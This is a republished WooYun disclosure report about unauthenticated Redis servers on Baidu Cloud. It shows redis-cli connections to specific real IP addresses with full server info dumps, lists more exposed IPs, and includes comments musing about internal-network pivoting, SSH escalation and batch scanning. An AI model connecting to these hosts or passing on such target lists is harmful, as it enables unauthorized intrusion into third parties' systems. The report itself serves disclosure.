百度多台Redis服务器未授权访问

2017年4月29日01:27:37评论253 views字数 201阅读0分40秒阅读模式

摘要

2016-04-13：细节已通知厂商并且等待厂商处理中
2016-04-13：厂商已经确认，细节仅向厂商公开
2016-04-23：细节向核心白帽子及相关领域专家公开
2016-05-03：细节向普通白帽子公开
2016-05-13：细节向实习白帽子公开
2016-05-28：细节向公众公开

漏洞概要关注数(20) 关注此漏洞

缺陷编号： WooYun-2016-195847

漏洞标题：百度多台Redis服务器未授权访问

漏洞作者：路人甲

提交时间： 2016-04-13 16:34

公开时间： 2016-05-28 19:20

漏洞类型：未授权访问/权限绕过

危害等级：高

自评Rank： 20

漏洞状态：厂商已经确认

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签：无

3人收藏

漏洞详情

披露状态：

简要描述：

百度多台服务器漏洞

详细说明：

redis未授权访问：

IP:180.76.140.233

code 区域

:~/.ssh# redis-cli -h 180.76.140.233 -p 6379
 180.76.140.233:6379> info
 # Server
 redis_version:2.8.4
 redis_git_sha1:00000000
 redis_git_dirty:0
 redis_build_id:a44a05d76f06a5d9
 redis_mode:standalone
 os:Linux 3.13.0-32-generic x86_64
 arch_bits:64
 multiplexing_api:epoll
 gcc_version:4.8.2
 process_id:24318
 run_id:8fe479471888bb4edc00af947ca7aea4e2541274
 tcp_port:6379
 uptime_in_seconds:6657827
 uptime_in_days:77
 hz:10
 lru_clock:1349883
 config_file:
 
 # Clients
 connected_clients:3
 client_longest_output_list:0
 client_biggest_input_buf:44
 blocked_clients:1
 
 # Memory
 used_memory:544768
 used_memory_human:532.00K
 used_memory_rss:1638400
 used_memory_peak:1237600
 used_memory_peak_human:1.18M
 used_memory_lua:38912
 mem_fragmentation_ratio:3.01
 mem_allocator:jemalloc-3.4.1
 
 # Persistence
 loading:0
 rdb_changes_since_last_save:10478
 rdb_bgsave_in_progress:0
 rdb_last_save_time:1454398032
 rdb_last_bgsave_status:err
 rdb_last_bgsave_time_sec:0
 rdb_current_bgsave_time_sec:-1
 aof_enabled:0
 aof_rewrite_in_progress:0
 aof_rewrite_scheduled:0
 aof_last_rewrite_time_sec:-1
 aof_current_rewrite_time_sec:-1
 aof_last_bgrewrite_status:ok
 
 # Stats
 total_connections_received:2166
 total_commands_processed:38777
 instantaneous_ops_per_sec:0
 rejected_connections:0
 sync_full:0
 sync_partial_ok:0
 sync_partial_err:0
 expired_keys:1
 evicted_keys:0
 keyspace_hits:12138
 keyspace_misses:7057
 pubsub_channels:0
 pubsub_patterns:0
 latest_fork_usec:196
 
 # Replication
 role:master
 connected_slaves:0
 master_repl_offset:0
 repl_backlog_active:0
 repl_backlog_size:1048576
 repl_backlog_first_byte_offset:0
 repl_backlog_histlen:0
 
 # CPU
 used_cpu_sys:1419.20
 used_cpu_user:1636.42
 used_cpu_sys_children:292.56
 used_cpu_user_children:166.27
 
 # Keyspace
 db0:keys=1,expires=0,avg_ttl=0

IP:182.61.9.225

code 区域

:~/.ssh# redis-cli -h 182.61.9.225 -p 6379
 182.61.9.225:6379> info
 # Server
 redis_version:3.0.5
 redis_git_sha1:00000000
 redis_git_dirty:0
 redis_build_id:a46578aeaeed0f67
 redis_mode:standalone
 os:Linux 2.6.32-431.el6.x86_64 x86_64
 arch_bits:64
 multiplexing_api:epoll
 gcc_version:4.4.7
 process_id:22404
 run_id:3e7fda016038c7bc6fb37480fb4bcb4199f909f3
 tcp_port:6379
 uptime_in_seconds:1786283
 uptime_in_days:20
 hz:10
 lru_clock:916177
 config_file:/etc/redis.conf
 
 # Clients
 connected_clients:2
 client_longest_output_list:0
 client_biggest_input_buf:0
 blocked_clients:0
 
 # Memory
 used_memory:901120
 used_memory_human:880.00K
 used_memory_rss:2678784
 used_memory_peak:949112
 used_memory_peak_human:926.87K
 used_memory_lua:36864
 mem_fragmentation_ratio:2.97
 mem_allocator:libc
 
 # Persistence
 loading:0
 rdb_changes_since_last_save:0
 rdb_bgsave_in_progress:0
 rdb_last_save_time:1460525179
 rdb_last_bgsave_status:ok
 rdb_last_bgsave_time_sec:0
 rdb_current_bgsave_time_sec:-1
 aof_enabled:0
 aof_rewrite_in_progress:0
 aof_rewrite_scheduled:0
 aof_last_rewrite_time_sec:-1
 aof_current_rewrite_time_sec:-1
 aof_last_bgrewrite_status:ok
 aof_last_write_status:ok
 
 # Stats
 total_connections_received:7213
 total_commands_processed:7534
 instantaneous_ops_per_sec:0
 total_net_input_bytes:398687
 total_net_output_bytes:126621
 instantaneous_input_kbps:0.00
 instantaneous_output_kbps:0.00
 rejected_connections:0
 sync_full:0
 sync_partial_ok:0
 sync_partial_err:0
 expired_keys:43
 evicted_keys:0
 keyspace_hits:633
 keyspace_misses:3
 pubsub_channels:0
 pubsub_patterns:0
 latest_fork_usec:215
 migrate_cached_sockets:0
 
 # Replication
 role:master
 connected_slaves:0
 master_repl_offset:0
 repl_backlog_active:0
 repl_backlog_size:1048576
 repl_backlog_first_byte_offset:0
 repl_backlog_histlen:0
 
 # CPU
 used_cpu_sys:507.02
 used_cpu_user:330.11
 used_cpu_sys_children:0.09
 used_cpu_user_children:0.00
 
 # Cluster
 cluster_enabled:0
 
 # Keyspace
 db0:keys=4,expires=0,avg_ttl=0

IP:180.76.149.53

code 区域

:~/.ssh# redis-cli -h 180.76.149.53 -p 6379
 180.76.149.53:6379> info
 # Server
 redis_version:3.0.6
 redis_git_sha1:00000000
 redis_git_dirty:0
 redis_build_id:5c7eaa2e19cb5102
 redis_mode:standalone
 os:Linux 2.6.32-431.el6.x86_64 x86_64
 arch_bits:64
 multiplexing_api:epoll
 gcc_version:4.4.7
 process_id:1732
 run_id:beb0c8ab0beb39c0e67978f94e8d52b5d6b80fc0
 tcp_port:6379
 uptime_in_seconds:6734471
 uptime_in_days:77
 hz:10
 lru_clock:916289
 config_file:/home/wwwroot/www.shell.com/redis-3.0.6/redis.conf
 
 # Clients
 connected_clients:3
 client_longest_output_list:0
 client_biggest_input_buf:0
 blocked_clients:0
 
 # Memory
 used_memory:917904
 used_memory_human:896.39K
 used_memory_rss:2617344
 used_memory_peak:949696
 used_memory_peak_human:927.44K
 used_memory_lua:36864
 mem_fragmentation_ratio:2.85
 mem_allocator:libc
 
 # Persistence
 loading:0
 rdb_changes_since_last_save:0
 rdb_bgsave_in_progress:0
 rdb_last_save_time:1460470546
 rdb_last_bgsave_status:ok
 rdb_last_bgsave_time_sec:0
 rdb_current_bgsave_time_sec:-1
 aof_enabled:1
 aof_rewrite_in_progress:0
 aof_rewrite_scheduled:0
 aof_last_rewrite_time_sec:-1
 aof_current_rewrite_time_sec:-1
 aof_last_bgrewrite_status:ok
 aof_last_write_status:ok
 aof_current_size:70952
 aof_base_size:0
 aof_pending_rewrite:0
 aof_buffer_length:0
 aof_rewrite_buffer_length:0
 aof_pending_bio_fsync:0
 aof_delayed_fsync:0
 
 # Stats
 total_connections_received:910
 total_commands_processed:1109
 instantaneous_ops_per_sec:0
 total_net_input_bytes:101816
 total_net_output_bytes:214890
 instantaneous_input_kbps:0.00
 instantaneous_output_kbps:0.00
 rejected_connections:0
 sync_full:0
 sync_partial_ok:0
 sync_partial_err:0
 expired_keys:0
 evicted_keys:0
 keyspace_hits:14
 keyspace_misses:0
 pubsub_channels:0
 pubsub_patterns:0
 latest_fork_usec:384
 migrate_cached_sockets:0
 
 # Replication
 role:master
 connected_slaves:0
 master_repl_offset:0
 repl_backlog_active:0
 repl_backlog_size:1048576
 repl_backlog_first_byte_offset:0
 repl_backlog_histlen:0
 
 # CPU
 used_cpu_sys:5805.96
 used_cpu_user:2799.02
 used_cpu_sys_children:0.14
 used_cpu_user_children:0.05
 
 # Cluster
 cluster_enabled:0
 
 # Keyspace
 db0:keys=1,expires=0,avg_ttl=0

ip:180.76.150.114

code 区域

:~/.ssh# redis-cli -h 180.76.150.114 -p 6379
 180.76.150.114:6379> info
 # Server
 redis_version:2.8.19
 redis_git_sha1:00000000
 redis_git_dirty:0
 redis_build_id:edaf234646095212
 redis_mode:standalone
 os:Linux 2.6.32-431.el6.x86_64 x86_64
 arch_bits:64
 multiplexing_api:epoll
 gcc_version:4.4.7
 process_id:25344
 run_id:67e5ec4c3834b9726edffc0ee3fb92b8ebc7ca51
 tcp_port:6379
 uptime_in_seconds:14007210
 uptime_in_days:162
 hz:10
 lru_clock:916339
 config_file:/etc/redis.conf
 
 # Clients
 connected_clients:43
 client_longest_output_list:0
 client_biggest_input_buf:0
 blocked_clients:0
 
 # Memory
 used_memory:1878720
 used_memory_human:1.79M
 used_memory_rss:7864320
 used_memory_peak:7404136
 used_memory_peak_human:7.06M
 used_memory_lua:35840
 mem_fragmentation_ratio:4.19
 mem_allocator:jemalloc-3.6.0
 
 # Persistence
 loading:0
 rdb_changes_since_last_save:0
 rdb_bgsave_in_progress:0
 rdb_last_save_time:1460364014
 rdb_last_bgsave_status:ok
 rdb_last_bgsave_time_sec:0
 rdb_current_bgsave_time_sec:-1
 aof_enabled:0
 aof_rewrite_in_progress:0
 aof_rewrite_scheduled:0
 aof_last_rewrite_time_sec:-1
 aof_current_rewrite_time_sec:-1
 aof_last_bgrewrite_status:ok
 aof_last_write_status:ok
 
 # Stats
 total_connections_received:459173997
 total_commands_processed:873581211
 instantaneous_ops_per_sec:46
 total_net_input_bytes:31283716245
 total_net_output_bytes:567422830645
 instantaneous_input_kbps:1.18
 instantaneous_output_kbps:18.84
 rejected_connections:0
 sync_full:0
 sync_partial_ok:0
 sync_partial_err:0
 expired_keys:0
 evicted_keys:0
 keyspace_hits:2112479520
 keyspace_misses:17
 pubsub_channels:0
 pubsub_patterns:0
 latest_fork_usec:340
 
 # Replication
 role:slave
 master_host:121.40.56.18
 master_port:6379
 master_link_status:up
 master_last_io_seconds_ago:1
 master_sync_in_progress:0
 slave_repl_offset:11671009
 slave_priority:100
 slave_read_only:1
 connected_slaves:0
 master_repl_offset:0
 repl_backlog_active:0
 repl_backlog_size:1048576
 repl_backlog_first_byte_offset:0
 repl_backlog_histlen:0
 
 # CPU
 used_cpu_sys:89698.45
 used_cpu_user:38758.61
 used_cpu_sys_children:2.06
 used_cpu_user_children:0.68
 
 # Keyspace
 db0:keys=440,expires=0,avg_ttl=0

ip:180.76.147.42

code 区域

:~/.ssh# redis-cli -h 180.76.147.42 -p 6379
 180.76.147.42:6379> info
 # Server
 redis_version:2.5.14
 redis_git_sha1:21645232
 redis_git_dirty:0
 redis_mode:standalone
 os:Linux 3.11.0-15-generic x86_64
 arch_bits:64
 multiplexing_api:epoll
 gcc_version:4.6.3
 process_id:13481
 run_id:52eb35d50863a823ec6fbccbc7faae2a3e5b8e61
 tcp_port:6379
 uptime_in_seconds:3129468
 uptime_in_days:36
 lru_clock:1349929
 
 # Clients
 connected_clients:2
 client_longest_output_list:0
 client_biggest_input_buf:0
 blocked_clients:0
 
 # Memory
 used_memory:564560
 used_memory_human:551.33K
 used_memory_rss:2146304
 used_memory_peak:645216
 used_memory_peak_human:630.09K
 used_memory_lua:31744
 mem_fragmentation_ratio:3.80
 mem_allocator:jemalloc-3.0.0
 
 # Persistence
 loading:0
 rdb_changes_since_last_save:85
 rdb_bgsave_in_progress:0
 rdb_last_save_time:1460534001
 rdb_last_bgsave_status:ok
 rdb_last_bgsave_time_sec:0
 rdb_current_bgsave_time_sec:-1
 aof_enabled:1
 aof_rewrite_in_progress:0
 aof_rewrite_scheduled:0
 aof_last_rewrite_time_sec:-1
 aof_current_rewrite_time_sec:-1
 aof_last_bgrewrite_status:ok
 aof_current_size:27831065
 aof_base_size:0
 aof_pending_rewrite:0
 aof_buffer_length:0
 aof_rewrite_buffer_length:0
 aof_pending_bio_fsync:0
 aof_delayed_fsync:0
 
 # Stats
 total_connections_received:2146
 total_commands_processed:342802
 instantaneous_ops_per_sec:0
 rejected_connections:0
 expired_keys:0
 evicted_keys:0
 keyspace_hits:992383
 keyspace_misses:194
 pubsub_channels:0
 pubsub_patterns:0
 latest_fork_usec:265
 
 # Replication
 role:master
 connected_slaves:0
 
 # CPU
 used_cpu_sys:4661.32
 used_cpu_user:2119.40
 used_cpu_sys_children:1.70
 used_cpu_user_children:0.11
 
 # Keyspace
 db0:keys=6,expires=0

180.76.145.62

182.61.29.196

180.76.128.189

180.76.190.64

182.61.11.94

180.76.157.68

180.76.189.225

180.76.149.110

180.76.173.112

182.61.2.64

182.61.25.194

180.76.150.168

180.76.137.209

180.76.161.242

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：低

漏洞Rank：1

确认时间：2016-04-13 19:15

厂商回复：

感谢提交，这些IP皆为百度开放云上的客户服务，我们已紧急多次联系客户修复漏洞，客户正在修复中。为了保护我们的客户，我们确认漏洞，避免忽略漏洞造成的客户损失。非常感谢您的提交

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

2016-04-13 17:31 | 坏男孩-A_A ( 实习白帽子 | Rank:81 漏洞数:23 | 膜拜学习中)

1

...可以内网游了吧

1# 回复此人
2016-04-13 17:40 | sysALong ( 普通白帽子 | Rank:464 漏洞数:100 | 在我们黑龙江这噶哒，就没有什么事是【撸串...)

1

有路徑提權嗎？ssh呢？

2# 回复此人
2016-04-23 23:06 | U神 ( 核心白帽子 | Rank:1375 漏洞数:153 | 乌云核心菜鸟，此号长期由联盟托管，如果近...)

0

洞主是怎么检测出弱口令，有没有批量的工具啊

3# 回复此人

漏洞概要 关注数(20) 关注此漏洞

缺陷编号： WooYun-2016-195847

漏洞标题： 百度多台Redis服务器未授权访问

相关厂商： 百度

漏洞作者： 路人甲

提交时间： 2016-04-13 16:34

公开时间： 2016-05-28 19:20

漏洞类型： 未授权访问/权限绕过

危害等级： 高

自评Rank： 20

漏洞状态： 厂商已经确认

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： 无

3人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

漏洞评价(共0人评价): 登陆后才能进行评分

评价

发表评论

在线咨询

微信

漏洞概要关注数(20) 关注此漏洞

漏洞标题：百度多台Redis服务器未授权访问

相关厂商：百度

漏洞作者：路人甲

漏洞类型：未授权访问/权限绕过

危害等级：高

漏洞状态：厂商已经确认

Tags标签：无

版权声明：转载请注明来源路人甲@乌云

漏洞评价(共0人评价):

登陆后才能进行评分